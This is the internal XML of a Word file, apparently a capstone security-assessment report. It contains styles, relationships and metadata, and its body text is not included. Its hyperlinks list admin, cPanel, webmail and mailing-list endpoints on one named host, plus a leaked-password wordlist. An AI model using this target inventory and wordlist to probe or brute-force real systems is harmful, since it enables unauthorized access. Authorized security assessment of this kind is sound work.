    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B652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52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52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52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23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36406"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00836406"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00870FC3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0087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3384"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00870FC3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00870FC3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00870FC3"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00870FC3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E64499"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable2">
    <w:name w:val="Grid Table 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="000051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051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77C93"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F4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D8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F4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D8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B409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5698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="163933911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="261914156">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="284318273">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="586118146">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="676807449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1849251470">
          <w:marLeft w:val="1166"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="866720602">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1114709180">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1352337215">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1574854306">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20166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hyperlink" Target="https://hrcms-admin.tri-niche.com/assets" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.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5.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/mailman/admin" TargetMode="External"/><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hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Passwords/darkweb2017-top100.txt" TargetMode="External"/><Relationship Id="rId181"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hyperlink" Target="https://hrcms-admin.tri-niche.com/assets" TargetMode="External"/><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1.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><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hyperlink" Target="https://hrcms-admin.tri-niche.com/mailman/listinfo" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><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85.png"/><Relationship Id="rId44"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hyperlink" Target="https://hrcms-admin.tri-niche.com/assets" TargetMode="External"/><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2.png"/><Relationship Id="Reabb1281c20f4ca8" Type="http://schemas.microsoft.com/office/2019/09/relationships/intelligence" Target="intelligence.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.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75.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/controlpanel" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/mailman/archives/"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mailto:Juicebar.capstone@gmail.com"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hrcms-admin.tri-niche.com/reimbursment/get_ctg_id/" TargetMode="External"/><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3.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.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hrcms-admin.tri-niche.com/mailman/archives/index.html"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hyperlink" Target="https://hrcms-admin.tri-niche.com/webmail" TargetMode="External"/><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hrcms-admin.tri-niche.com/index.php/reimbursment/get/"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39.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.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hyperlink" Target="https://hrcms-admin.tri-niche.com/pipermail/"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hrcms-admin.tri-niche.com/mailman/" TargetMode="Externa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image" Target="media/image13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png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/assets" TargetMode="External"/><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0.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/pipermail/index.html" TargetMode="External"/><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27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hrcms-admin.tri-niche.com/files" TargetMode="External"/><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6.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.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hrcms-admin.tri-niche.com/cpanel" TargetMode="External"/><Relationship Id="rId114"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6724D69C4A2643B32EC3B349496B98" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="00f79b22ae6c49595dee17e4fc82d7ce">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="a5a90c7d-0e98-467f-9b04-54754a86672d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9051898dfb630ba74283958719e02303" ns1:_="" ns2:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="a5a90c7d-0e98-467f-9b04-54754a86672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90c7d-0e98-467f-9b04-54754a866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7ABB9-8ECB-4FAD-92A1-4F09054160E9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4E75EA37-28B7-4FAB-BBD8-2D73D39F19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FACCCC-6BE5-4D34-B163-8BE46C48A946}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D5073A0A-7198-4FB3-8C42-3FC829E1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a90c7d-0e98-467f-9b04-54754a866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5</Pages>
  <Words>16719</Words>
  <Characters>95301</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>794</Lines>
  <Paragraphs>223</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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Jia Cheng Glenn /CSF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lee Yu Yee Dominic /CSF</cp:lastModifiedBy>
  <cp:revision>2867</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-28T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-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724D69C4A2643B32EC3B349496B98</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingHeaderShapeIds">
    <vt:lpwstr>1e,1211966,121196a</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingHeaderFontProps">
    <vt:lpwstr>#000000,11,Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ClassificationContentMarkingHeaderText">
    <vt:lpwstr>                    Official Open</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SetDate">
    <vt:lpwstr>2022-02-28T03:36:08Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_Name">
    <vt:lpwstr>dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_SiteId">
    <vt:lpwstr>cba9e115-3016-4462-a1ab-a565cba0cdf1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ActionId">
    <vt:lpwstr>8d6a2bb5-4e0a-4e27-9084-7c59ec66fdf9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_dd7aeb4d-f421-48c2-a20e-7b6cd62b5b82_ContentBits">
    <vt:lpwstr>1</vt:lpwstr>
  </property>
</Properties>
</file>